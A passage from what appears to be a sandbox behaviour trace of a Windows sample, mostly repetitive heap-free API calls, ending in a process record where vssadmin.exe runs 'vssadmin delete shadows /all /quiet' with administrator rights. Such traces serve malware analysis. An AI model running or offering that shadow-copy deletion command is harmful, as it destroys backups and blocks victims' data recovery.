BaseAddress=0xc5cd80) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd50) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cc80) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd60) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce00) returned 1 [0159.899] GetProcessHeap () returned 0xc50000 [0159.899] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cda0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd00) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ccd0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cde0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd10) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd90) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce40) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ccc0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cc90) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd70) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cce0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cdb0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cdf0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd20) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd30) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cdc0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cca0) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cc50) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce10) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce20) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ce30) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cc60) returned 1 [0159.900] GetProcessHeap () returned 0xc50000 [0159.900] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cd40) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5ccb0) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5cdd0) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d138) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d128) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d208) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d158) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d1a8) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d168) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d148) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d178) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d188) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d198) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d1b8) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d1c8) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d1d8) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d058) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d218) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d248) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d068) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d0b8) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d0c8) returned 1 [0159.901] GetProcessHeap () returned 0xc50000 [0159.901] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d0e8) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d238) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d228) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d1e8) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d078) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d088) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d0f8) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d1f8) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d098) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d0a8) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d0d8) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d108) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d118) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d368) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.902] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d328) returned 1 [0159.902] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d2a8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d388) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d2b8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d2e8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d3a8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d358) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d278) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d338) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d348) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d308) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d2c8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d3c8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d418) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d398) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d378) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d3f8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d2f8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d3b8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d318) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d3d8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d3e8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.903] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d2d8) returned 1 [0159.903] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d288) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d408) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d258) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d268) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d298) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d630) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d470) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d4c0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d650) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d550) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d4f0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d4a0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d480) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d640) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d5f0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d500) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d460) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d490) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d4b0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d5d0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d4e0) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.904] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d510) returned 1 [0159.904] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d5e0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d5b0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d4d0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d600) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d560) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d520) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d530) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d5c0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d570) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d540) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d580) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d590) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d5a0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d610) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d620) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d740) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d730) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d7c0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d790) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d6d0) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d680) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.905] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d750) returned 1 [0159.905] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d7d0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d710) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d7e0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d7f0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d810) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d760) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d800) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d7b0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d770) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d720) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d820) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d700) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d6c0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d660) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d6e0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d6f0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d690) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d670) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d780) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d7a0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d6a0) returned 1 [0159.906] GetProcessHeap () returned 0xc50000 [0159.906] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5d6b0) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5dc18) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db68) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db78) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5daa8) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5dba8) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5dc28) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5da78) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5da68) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5dbe8) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db58) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db88) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db98) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db08) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5da98) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db48) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5da88) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5dbb8) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db28) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5db38) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5daf8) returned 1 [0159.907] GetProcessHeap () returned 0xc50000 [0159.907] RtlFreeHeap (HeapHandle=0xc50000, Flags=0x0, BaseAddress=0xc5dab8) returned 1 [0159.907] FreeLibrary (hLibModule=0x6be40000) returned 1 [0159.908] exit (_Code=0) Thread: id = 63 os_tid = 0xe94 Thread: id = 65 os_tid = 0xf1c Thread: id = 71 os_tid = 0x13c8 [0159.279] LocalAlloc (uFlags=0x40, uBytes=0x178) returned 0xc7cae0 [0159.279] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0xc8bb38 [0159.279] LocalAlloc (uFlags=0x0, uBytes=0xc) returned 0xc8bd30 [0159.280] LocalAlloc (uFlags=0x40, uBytes=0x84) returned 0x50f06f0 [0159.280] LocalReAlloc (hMem=0xc8bd30, uBytes=0x10, uFlags=0x2) returned 0xc6dcb0 [0159.280] LocalFree (hMem=0xc7cae0) returned 0x0 [0159.280] LocalFree (hMem=0x50f06f0) returned 0x0 [0159.280] LocalFree (hMem=0xc6dcb0) returned 0x0 [0159.280] LocalFree (hMem=0xc8bb38) returned 0x0 Thread: id = 72 os_tid = 0x1240 Thread: id = 73 os_tid = 0xf84 Thread: id = 209 os_tid = 0xff4 Process: id = "12" image_name = "vssadmin.exe" filename = "c:\\windows\\syswow64\\vssadmin.exe" page_root = "0x78226000" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xd0c" cmd_line = "vssadmin delete shadows /all /quiet " cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 62 os_tid = 0xe90 Thread: id = 64 os_tid = 0xebc Thread: id = 66 os_tid = 